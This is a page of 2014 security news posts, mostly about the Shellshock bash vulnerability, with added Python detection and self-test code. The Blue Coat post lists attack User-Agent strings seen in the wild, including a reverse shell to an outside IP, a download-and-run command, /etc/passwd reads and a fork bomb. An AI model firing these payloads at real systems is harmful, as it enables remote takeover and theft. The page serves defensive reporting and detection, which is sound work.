
Blue Coat’s Shell Shocked Response

Posted on: September 30th, 2014 by

By ASM


By Dr. Hugh Thompson Program Committee Chairman of RSA Conference, Senior VP and Chief Security Strategist of Blue Coat Systems

Since the announcement of the CVE-2014-6271 bash bug, we’ve seen attackers waste no time before scanning the Internet. The announcement was posted to bugzilla.redhat.com at 2014-09-24T14:00:08+00:00, and at 2014-09-24T18:32:08+00:00, 4½ hours later, we started seeing scans looking for the vulnerability.

If you haven’t had a chance to read the details yet, or have been away for the last 24 hours, I’ll give a quick run-down. In essence, the vulnerability exists in the way bash evaluates environment variables. If a variable’s value begins with “() {” then the rest of the value is evaluated by the shell parser when bash starts, prior to anything being passed on the bash command line. For example, if I set the variable var to ‘echo boo’ and then try to pass that to a command shell, nothing happens.

plum@Hall:~$ export var='echo boo'
plum@Hall:~$ bash -c 'var'
bash: var: command not found
plum@Hall:~$

But if I add “() { :;};” in front, something magical happens.

plum@Hall:~$ export var='() { :;}; echo boo'
plum@Hall:~$ bash -c 'var'
boo
plum@Hall:~$

The contents of my variable were executed on the command line! One place where this becomes a huge issue is web applications. $HTTP_USER_AGENT is one such variable that is automatically set from the request header when using CGI and PHP. An attacker can spoof that header, and if that variable ever crosses paths with the shell, bad things can happen.

Here are just a few examples of User-Agents we have seen scanning for this vulnerability:

() { :;}; /bin/ping -c 1 198.101.206.138
() { :;}; echo; echo vulnerable to CVE-2014-6271
() { :; }; :(){ :|: & };:
() { touch /tmp/coco; };
() { :;}; echo; /usr/bin/id;
() { :;}; /bin/sleep 0
() { :;}; echo aa>/tmp/aa
() { :;}; /bin/bash -c 'cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur'
() { :;}; /usr/bin/telnet 67.229.128.88 21
() { :;}; echo 'Warning: Server Vulnerable'
() { :;}; #{/usr/bin/ping -c 1 192.71.20.2}
() { test;};/usr/bin/touch /tmp/VULNERABLE
() { :; }; echo ; echo qwerty
() { :;}; /bin/ping -c 1 192.71.20.2
() { :; }; ping -c 11 209.126.230.74
() { :;}; wget http://shellshock.brandonpotter.com/report/WWOJ2KWSVKOWF40WXBND74/User-Agent
() { :;}; echo 'BashSmash:
() { :;}; echo OHAI
() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd
() { :; }; /bin/cat /etc/passwd > dumped_file
() { :; }; echo -e 'Content-Type: text/plainn'; echo qQQQQQq
() { :; }; /bin/bash -i > /dev/tcp/176.31.93.197/8081 0>&1

Additionally, we’ve also started seeing DDoS botnets trying to utilise this in their attacks. For a little while I’d expect to see an ever-increasing amount of web traffic targeting this vulnerability.

Because this bug exists in the /bin/bash parser, it could rear its ugly head in any number of fields accepted from a client. User-Agent, Referer, URL variables, cookies, and any other header fields are all possibilities. It all depends on server configuration and whether any of those fields are passed as an environment variable to a shell. As more common web frameworks are analysed I would expect more targeted attacks to be forthcoming. There are already findings suggesting that other services may be affected by this too.

There is already a patch out for the nasty bug and if you have automatic updates configured there is a good chance it may already be installed. However, I wouldn’t bet your server on it so it would be best to double check.

Using the Security Analytics Appliance we can easily detect these attacks. Simply create a filter looking for the “() {}” pattern in HTTP requests to start tracking the attempts, as shown below.

{"Shell Shock User-Agent attempt":["user_agent=*(*)*{*}*"]}
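The filter above is a loose wildcard match. As an added example (not Blue Coat’s code or the appliance’s own syntax), the following Python applies that wildcard to constructed sample records alongside a tighter pattern that keys on the exact “() {” prefix bash imports as a function, and checks every client-controlled field rather than User-Agent alone. The record layout, field names, and IP addresses are assumptions; the payload strings are the ones listed above.

```python
import fnmatch
import re

# The wildcard filter quoted above for the Security Analytics Appliance,
# reduced to its value part so fnmatch can apply it: user_agent=*(*)*{*}*
LOOSE_FILTER = "*(*)*{*}*"

# Tighter pattern: an empty parameter list followed by an opening brace,
# the exact prefix bash looks for when importing a function from the env.
TIGHT_RE = re.compile(r"\(\s*\)\s*\{")

# Request fields a CGI server copies into the environment; all of them are
# chosen by the client, so all of them need the same check.
CLIENT_FIELDS = ("user_agent", "referer", "cookie", "query")

# Constructed sample records (not from any real server). The payload
# strings are ones listed in the article; the IPs are documentation ranges.
SAMPLE_LOGS = [
    {"src": "203.0.113.10", "user_agent": "() { :;}; echo; echo vulnerable to CVE-2014-6271",
     "referer": "-", "cookie": "-", "query": "-"},
    {"src": "203.0.113.11", "user_agent": "() { :;}; echo; /usr/bin/id;",
     "referer": "-", "cookie": "-", "query": "-"},
    # Payload carried in the Referer header behind an ordinary User-Agent.
    {"src": "203.0.113.12", "user_agent": "Mozilla/5.0 (X11; Linux x86_64)",
     "referer": "() { test;};/usr/bin/touch /tmp/VULNERABLE", "cookie": "-", "query": "-"},
    # Benign User-Agent that happens to contain parentheses and braces.
    {"src": "203.0.113.13", "user_agent": "CustomClient/1.0 (Linux) build{42}",
     "referer": "-", "cookie": "-", "query": "-"},
    {"src": "203.0.113.14", "user_agent": "curl/7.37.0",
     "referer": "-", "cookie": "-", "query": "-"},
]


def loose_match(value):
    """Apply the appliance-style wildcard filter to one header value."""
    return fnmatch.fnmatchcase(value, LOOSE_FILTER)


def tight_match(value):
    """Flag only values that open a bash function definition."""
    return TIGHT_RE.search(value) is not None


def scan(records):
    """Return (src, field, value) for every client field carrying the
    function-definition prefix, whichever header it arrives in."""
    hits = []
    for rec in records:
        for field in CLIENT_FIELDS:
            value = rec.get(field, "-")
            if tight_match(value):
                hits.append((rec["src"], field, value))
    return hits


def compare_filters(records):
    """Count User-Agent hits per filter to expose the false-positive gap."""
    agents = [rec["user_agent"] for rec in records]
    return {
        "loose": sum(1 for ua in agents if loose_match(ua)),
        "tight": sum(1 for ua in agents if tight_match(ua)),
    }


if __name__ == "__main__":
    for src, field, value in scan(SAMPLE_LOGS):
        print(f"{src} {field}: {value}")
    print(compare_filters(SAMPLE_LOGS))
```

The loose filter counts the benign CustomClient string as a hit while missing the payload hidden in Referer; the tight pattern run over every field catches the three probes and nothing else.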

This would also be a good time to evaluate your web applications and determine just what is being thrown across the command line. Calls to popen(), system(), Runtime.getRuntime().exec() or the equivalent can all expose the vulnerability when client-supplied data reaches the environment of the shell they spawn.

The post Blue Coat’s Shell Shocked Response appeared first on Australian Security Magazine | Australian Security News | Security Products |Asia Pacific Security News.

…read more

Source: Blue Coat’s Shell Shocked Response


Kaspersky Lab appoints Australian as APAC Managing Director

Posted on: September 30th, 2014 by

By ASM


Kaspersky Lab has announced the appointment of Peter Hewett to the position of Managing Director for the Asia Pacific region.

In his new role, Hewett will be responsible for the company’s overall business operations in the Asia Pacific region, including sales, marketing and business development functions.

Hewett brings to the role a range of expertise in the development of regional business strategies, and is helping build on the company’s continued success amidst what is arguably the world’s most dynamic region.

“I am glad to have the opportunity to join Kaspersky Lab and I’m excited to take on this role in this fast-growing region. I believe the Asia Pacific team has taken great strides to establish the market-leading position that Kaspersky Lab now enjoys in the region. I look forward to leveraging my technical and business management expertise as I work with the entire APAC team to further reinforce this position and reach greater heights in driving business growth,” Hewett said.

With 23 years’ experience working across the channel in both vendor and distributor environments, he brings to Kaspersky Lab a strong commercial understanding of business and consumer-orientated IT security solutions, and is helping drive Kaspersky Lab’s channel-driven strategy across the APAC region.

“The ongoing economic boom in Asia has made the APAC region a market that is both fast growing and very challenging. We are prepared for this, offering a comprehensive line of fully-fledged security solutions backed up by a strong regional team that is now enhanced by Peter Hewett’s leadership,” Garry Kondakov, Kaspersky Lab’s Chief Business Officer, said.

The appointment follows the retirement of Harry Cheung, who held the position from 2008.

Prior to joining Kaspersky Lab, Hewett was Sales Director for Westcon Group Australia.


Lockheed Martin Australia establishes Asia Pacific ICT Engineering hub in Melbourne

Posted on: September 30th, 2014 by

By ASM


Lockheed Martin has announced it is establishing an Asia Pacific Information Communications Technology (ICT) engineering hub in Melbourne in close partnership with the government of Victoria. The new engineering hub is expected to generate up to 150 new ICT jobs in Lockheed Martin Australia’s operations in Melbourne, more than doubling its current workforce.

The new Asia Pacific ICT engineering hub will be operated by Lockheed Martin’s Information Systems and Global Solutions (IS&GS) business. The facility will be equipped to provide a full range of regional research and development and program delivery service. The capabilities that will be based at the facility will expand existing local skills in cyber security, data management, applications development and larger scale ICT services.

Lockheed Martin IS&GS Vice President for Global Solutions, Anne Mullins, said $8 million will be invested to establish the Asia Pacific ICT engineering hub in a new facility at Clayton, a suburb of Melbourne. “This investment adds to our existing footprint in Dandenong and Glen Waverley, and will accommodate 190 staff primarily servicing ICT systems development. At least 150 of these will be new personnel, doubling our presence in Melbourne and providing high technology jobs to service local customers and capability to expand export opportunities”.

A financial support package from the Victorian Government focused on infrastructure enhancements, training and upskilling was instrumental in supporting the business case for a Victorian location. The support package will be used to assist Lockheed Martin deliver to its expanding workforce world class skills in key global technologies in cyber, mobility and big data. “Following the recent signature of an $800 million contract to transform the ICT environment for the Australian Department of Defence, Victorian staff will play a key role in not only advancing that capability, but also providing support for the customer over the next decade,” said Anne Mullins.

Lockheed Martin Australia and New Zealand Chief Executive, Raydon Gates, said “establishment of the Asia Pacific ICT engineering hub builds on a 20-year history of Lockheed Martin undertaking high technology development work in Victoria. This business has successfully delivered dozens of programs to State and Federal Government organisations and commercial customers since the original contract with the Department of Defence to develop the Jindalee Over-the-Horizon Radar Network (JORN), which remains one of Australia’s largest indigenous technology national security projects.

Lockheed Martin is a global leader in complex ICT systems delivery and support, and has been the largest supplier of ICT services to the U.S. Government for twenty years in succession. At Lockheed Martin Australia’s headquarters in Canberra, the company currently supports demanding ICT requirements for the Australian Tax Office, and operates an Australian Cyber Capabilities demonstration and operations centre.

“Victoria was selected to establish the new Asia Pacific ICT engineering hub based on the State’s availability of highly skilled graduates, outstanding ICT education institutions and the support provided by the state government” said Raydon Gates. “This investment in Victoria will not only extend the skill base of our Australian cyber centre, but will also act as a hub to generate activity and engagement with small-to-medium sized companies, thus further expanding Lockheed Martin’s Global Supply Chain initiatives which have already generated multiple Australian export success stories.”

Headquartered in Bethesda, Maryland, Lockheed Martin is a global security and aerospace company that employs approximately 113,000 people worldwide and is principally engaged in the research, design, development, manufacture, integration, and sustainment of advanced technology systems, products and services. The Corporation’s net sales for 2013 were US$45.4 billion. Lockheed Martin Australia, headquartered in Canberra, is a wholly-owned subsidiary of Lockheed Martin Corporation. The company employs more than 900 people in Australia and New Zealand working on a wide range of major programmes spanning the aerospace, defence and civil sectors.


S2 Security Introduces S2 Mobile Security Officer

Posted on: September 30th, 2014 by

By APSM


Revolutionary Tablet App Makes Security Departments More Effective

S2 Security, the  leader in IP-­‐based integrated physical security systems, has announced the introduction of S2 Mobile Security Officer, a revolutionary tablet app that makes security departments more effective. With S2 Mobile Security Officer, security management and staff can now operate their S2 access control and video management systems from anywhere, dramatically improving productivity, decision-making and response time.

Modelled after the “battlefield awareness” concept developed by military operations, S2 Mobile Security Officer is designed for ease of use, speed of information sharing, and real time response to situations in the field, while leveraging the advanced technology built in to every S2 system. S2 Mobile Security Officer is administered from a central location, and all actions taken by field security officers are instantly sent back to the command centre.

“Our vision is for users to be able to interact with their S2 system wherever, whenever and however they want,” said John L. Moss, CEO, S2 Security. “S2 Mobile Security Officer is an industry first that makes this a reality, with more exciting product developments to come.”

S2 Mobile Security Officer allows mobile users to remotely open or lock doors; monitor activity and alarms; and muster for evacuations, coordinating multiple mustering points right on the tablet screen. Acting as a photo ID capture camera, S2 Mobile Security Officer lets users take photos and add them immediately to their centrally managed S2 system from the field. Users can also access and control surveillance cameras on demand, displaying high-quality, high frame rate video that can be shared as needed, where needed.


Parental sexual offending: Managing risk through diversion

Posted on: September 29th, 2014 by

Using an Australian sample of 172 male parental offenders referred to community-based treatment designed for low-risk offenders, this study retrospectively compared risk levels and re-offence rates of offenders accepted into treatment (46%) with those who returned to court for standard criminal prosecution (54%). The Violence Risk Scale-Sexual Offender Version, a third-generation actuarial sex offender risk assessment and treatment planning tool, measured dynamic risk before treatment.


Shellshock – potentially a ‘plague-like’ vulnerability

Posted on: September 26th, 2014 by

By APSM


According to the threat defence experts at Trend Micro, since Shellshock is related to Linux, it can affect both PC and Apple platforms.

In short, this is potentially a “plague-like” vulnerability that can exploit command access to Linux-based systems constituting approximately 51 percent of web servers in the world.  Because of the pervasiveness, attacks against it could “grow” at a very fast pace. The recent Heartbleed vulnerability is similar in nature to Shellshock, but Heartbleed is dwarfed by the extent and reach of this new vulnerability.

Due to the widespread nature of Shellshock, the actions listed below should be taken by the following:

  1. End-user: watch for patches and implement them immediately
  2. IT Admin: if you have Linux, disable BASH scripting immediately
  3. Website operator: if BASH is in the script, patch ASAP, or rescript away from BASH
  4. Hosting company customer: ask your provider what they’re doing to remedy the issue and apply patches accordingly

Security experts from NetIQ also strongly urge companies to identify all sensitive, Internet-facing servers and conduct a patch analysis in light of the Shellshock bug. According to Geoff Webb, Senior Director, Solution Strategy at NetIQ, in cases where patch records are difficult to obtain or nonexistent, it is then time for “boots on the ground.” Security officers or administrators can perform a quick test on a server or appliance to see if it is vulnerable.

The following simple script may be executed from a Bash command prompt. If the message “This system is vulnerable” appears, the server must be patched immediately or disconnected from the Internet until maintenance can be performed. In the example above, I have demonstrated a vulnerable system. If the system has already been patched, then it would report something like the following:

bash: warning: myvar: ignoring function definition attempt
bash: error importing function definition for `myvar'
Test for Shellshock:

The test above does not scale to hundreds of servers or more. This is where an investment in a patch management and automation system or vulnerability remediation tool pays for itself.
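The quick test can be wrapped so it can be run from an inventory script. The following Python is an added example, not the NetIQ script the article refers to: it starts bash with a variable whose value begins with “() {” followed by a marker command, then classifies the outcome using the patched-bash messages quoted above. The variable name myvar, the marker string and the verdict labels are assumptions; only the local bash binary is touched.

```python
import shutil
import subprocess

# Probe variable name (the one the patched-bash output above refers to)
# and a marker that can only appear if the trailing command was executed.
PROBE_VAR = "myvar"
MARKER = "shellshock-probe-executed"

# Messages a patched bash emits when it refuses the trailing command.
# Later fixes change the variable format entirely and print nothing at all.
PATCHED_MARKERS = (
    "ignoring function definition attempt",
    "error importing function definition",
)


def classify(stdout, stderr):
    """Map probe output to a verdict.

    'vulnerable'           the command after the function body ran
    'patched-with-warning' bash refused the definition and said so on stderr
    'not-vulnerable'       bash silently ignored the trailing text
    """
    if MARKER in stdout:
        return "vulnerable"
    if any(m in stderr for m in PATCHED_MARKERS):
        return "patched-with-warning"
    return "not-vulnerable"


def probe_bash(bash="bash"):
    """Launch bash with the crafted variable in its environment and classify.

    Returns 'bash-not-found' when no such binary is on PATH, otherwise one
    of the verdicts from classify().
    """
    path = shutil.which(bash)
    if path is None:
        return "bash-not-found"
    env = {
        "PATH": "/usr/bin:/bin",
        PROBE_VAR: "() { :;}; echo " + MARKER,
    }
    # The -c command is harmless; what matters is whether bash executes the
    # text that follows the function body while importing the environment.
    proc = subprocess.run(
        [path, "-c", "echo probe-complete"],
        env=env, capture_output=True, text=True, timeout=10, check=False,
    )
    return classify(proc.stdout, proc.stderr)


if __name__ == "__main__":
    print("local bash:", probe_bash())
```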

Bogdan Botezatu, Senior E-Threat Analyst at Bitdefender, suggests that while most operating system vendors have already issued a partial fix to make attacks more difficult to implement, this is not a complete fix but rather a barrier to buy vendors more time to find a universal solution.

“A significant part of the Internet is running a Linux or UNIX-based version of an operating system that includes the bash shell. These UNIX-based web servers often run CGI scripts that rely on bash for functionality, therefore any attack against these scripts could result in exploitation and subsequently, could allow a hacker to remotely own the machine,” says Mr Botezatu.

“Additionally, attacks against web servers are very easy to implement and carry. The typical attack scenario involves an automated tool that tries to access CGI scripts and pass the environment variable as User-Agent (a string that tells the webserver what type of browser is being used on the other end so that the server knows how to format data before sending it).”

Bogdan advises that workstations (such as Mac OS X computers) and embedded Linux devices can also be subverted via bash attacks if specific prerequisites are met, i.e. the attacker resides on the same network as the victim device.

It is recommended that those with vulnerable systems update the operating system immediately and then check back to see if there is a complete fix available.


Palo Alto Networks addresses Bash vulnerability Shellshock

Posted on: September 26th, 2014 by

By ASM


The details of a vulnerability in the widely used Bourne Again Shell (Bash) have been disclosed by multiple Linux vendors. The vulnerability, assigned CVE-2014-6271 by Mitre, was originally discovered by Stephane Chazelas, a Unix and Linux network and telecom administrator and IT manager at UK robotics company SeeByte, Ltd.

While this vulnerability didn’t come with quite the fanfare or a catchy name like Heartbleed, the security community quickly dubbed it “Shellshock.” Bash is present in most Linux and Unix distributions as well as Apple’s Mac OS X, and there’s a good chance anyone reading this has a system they need to patch.

Palo Alto Networks initiated an emergency IPS content release to detect this vulnerability last night with Signature ID: 36729 “Bash Remote Code Execution Vulnerability.”

All versions of PAN-OS and Panorama include the vulnerable version of Bash, but we’ve determined the issue is only exploitable by authenticated users. Normal PAN-OS maintenance release updates will provide a fix for the vulnerability. We have posted the advisory on our product vulnerability page. Read on for more details.

Vulnerability Details

CVE-2014-6271 exists in all versions of Bash and is related to how environment variables are processed when the shell starts up. Environment variables are used by shell software to store pieces of information like the location of the user’s home directory. In addition to storing variables, Bash allows for storing shell functions in variables that users can call later. It’s in parsing these functions that the new Bash vulnerability exists, as the shell mistakenly executes code that is added after a function definition. Here’s an example:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

Bash should stop processing the environment variable “x” after the closing semicolon for the function, but instead continues to process “echo vulnerable”. At first glance, this might not seem too dangerous as executing commands is Bash’s primary function, but it’s important to understand that many other programs use Bash to process commands.

  • Apache Servers running mod_cgi and mod_cgid may spawn Bash shells and pass malicious HTTP Headers and request variables that exploit the vulnerability.
  • OpenSSH parses passed environment variables with Bash in some cases, making it vulnerable to privilege escalation through this vulnerability.

While these two scenarios are currently the most-likely vectors for exploiting this vulnerability, it’s likely that other services use Bash in a network-exploitable way. The only way to fully prevent exploitation is to upgrade Bash on the system to a non-vulnerable version.

Impact

The good news is that this vulnerability was disclosed responsibly and patches are available for most platforms on the day of the public disclosure. The bad news is that this vulnerability is going to have a very long tail. Bash is the default shell for the most-popular Linux variants and every version of the software stretching back over two decades is vulnerable. Well-maintained systems will be patched today, but that dusty old system in the networking closet might never get the update. Additionally, network devices, embedded systems and Internet-connected devices (like IP Cameras) often run Linux and could be vulnerable.

Fortunately, not every system is remotely exploitable simply because it’s running Bash; it also needs to be running an application which makes Bash accessible over the network. As described above, the most common exploit scenario seems likely to be web servers running Apache and using CGI scripts. Web servers are great resources for attackers. They can be used to:

  • Launch DDoS attacks (See Operation Ababil)
  • Infect visitors with malware
  • Gain a foothold in a network and spread to additional systems
  • Steal sensitive data accessible to the web server

These are all likely outcomes from mass scanning of the Internet for vulnerable hosts, which are already underway.

Recommendations

  • Palo Alto Networks Threat Prevention customers should immediately update to Threat Content Version 457 to deploy vulnerability signature 36729, which detects exploitation of CVE-2014-6271 through HTTP requests.
  • Monitor Threat logs for hits on this signature and consider blocking future requests from the sending IP addresses. This activity may be an attacker performing reconnaissance against your network for future attacks.
  • Apply patches to vulnerable systems to update Bash to a non-vulnerable version.

At the time of this publication Apple has not released updates for Mac OS X to address this issue. However, patches for Bash 3.2 (included with Mac OS 10.9) are available from org for those who choose to compile their own version. If you can’t update Bash, consider replacing it with an alternative shell but be aware that this can cause compatibility issues.

PAN-OS users can mitigate the impact of this vulnerability by disabling non-administrator accounts that could use the vulnerability to gain escalated privileges.


Australia hits number one in global phishing attacks

Posted on: September 26th, 2014 by

By ASM


Analysis undertaken by Kaspersky Lab experts examining the latest evolution of spam has revealed that Australia almost doubled its share of global phishing attacks, making it the world’s most targeted country for phishing attacks.

The analysis of August figures shows that the number of Anti-Phishing component activations on computers of Australian users doubled, accounting for nearly a quarter of the world’s total phishing attacks, at 24.4%.

Australia’s latest ranking has pushed Brazil (19.5%) down to second position. The UK (15.2%) and Canada (14.6%) came third and fourth respectively.

August saw phishing activity increase by 62% with 32 million detections globally. Experts have attributed this considerable growth in phishing attacks to the seasonal decline in the demand for advertising spam.

“In August, we recorded a significant increase in the number of phishing attacks. To keep making money cybercriminals have switched to other types of spam, including phishing scams. By faking messages from well-known services, social networks or financial organisations, phishers are able to significantly improve the chances of their spam being successful,” Tatyana Shcherbakova, Anti-spam Analyst at Kaspersky Lab, said.

Yahoo! was attacked often enough to displace Windows Live as one of the top three organisations attacked by phishers, ranking behind Facebook and Google; with the latter maintaining its top position among organisations attacked by phishers.

Overall, the US ranked first among source countries of spam distributed around the world, while the UK now leads the ranking based on the number of users targeted by spammers sending malicious attachments.

Cybercriminals who distributed malicious attachments in spam messages again used fake Facebook notifications as a lure for users. The spam messages indicated to users that the social networking site had been hacked, with the faux ‘developers’ asking users to install the utility attached in order to avoid problems in future. Instead of the promised utility, the ZIP archive attached to the message contained the Haze Trojan-Downloader, which is used by cybercriminals to download other malware, including code designed to steal personal data from the computer’s owner or send infected messages to all the addresses in the contact list.

The top three positions in August’s malware ranking were taken by Trojans; the top two of which – Redirector and Fraud – are HTML-pages. Redirector steers users to an infected site, where they are usually invited to download Binbot – a service for automatically trading in popular binary options. As for Fraud, it is used as a registration form for online banking services and sends stolen financial information to phishers. The third position is taken by the Upatre Trojan-Downloader. Malware in this family usually downloads a Trojan-Banker designed to attack financial institutions.

Kaspersky Lab has cautioned users to be more vigilant against these types of attacks.

“To avoid becoming a victim, remember these simple rules: check the sender address and be particularly careful with messages containing attachments. It’s better to contact the company directly than trust an email and lose your personal data,” Shcherbakova said.

The full text of the report is available on Kaspersky Lab’s Securelist website.


‘Aspiring to Excellence’ Security Research Initiative Report

Posted on: September 25th, 2014 by

By ASM


The final published copy of this year’s Security Research Initiative report, ‘Aspiring to Excellence’, has been publicly released. The final report can be accessed along with other publications via:

http://perpetuityresearch.com/1473/aspiring-to-excellence/


McAfee uncovers BERserk security flaw in Mozilla Firefox browser

Posted on: September 25th, 2014 by

By APSM


The Intel Security Advanced Threat Research Team has discovered a critical signature forgery vulnerability in the Mozilla Network Security Services (NSS) crypto library that could allow malicious parties to set up fraudulent sites masquerading as legitimate businesses and other organisations, accessible to Firefox users (20% of the Internet’s users).

“Ensuring user security and privacy on the Internet has always been a top priority at Intel Security,” said James Walter, Director, Intel Security Advanced Threat Research.

“Dubbed ‘BERserk’, the vulnerability could be exploited to allow malicious parties to set up fraudulent web sites masquerading as legitimate websites normally identified and protected by Secure Sockets Layer (SSL) authentication and encryption,” says James.

“Upon discovery of this issue, the Intel Advanced Threat Research team notified Mozilla to facilitate the mitigation and resolution of the vulnerability. We also engaged CERT/CC to ensure that all affected parties are responsibly and effectively notified and given mitigation guidance on this issue, and to review other commonly used cryptographic libraries for similar issues.”

He added, “While Intel is unaware of any attacks exploiting BERserk, we strongly advise individuals and organisations using Firefox to take immediate action to update their browsers with the latest security update from Mozilla.”

McAfee will continue to update our customers, affected parties, and the broader consumer and business user communities as new details emerge.

For more information, please see McAfee blog post here: http://blogs.mcafee.com/?p=38215
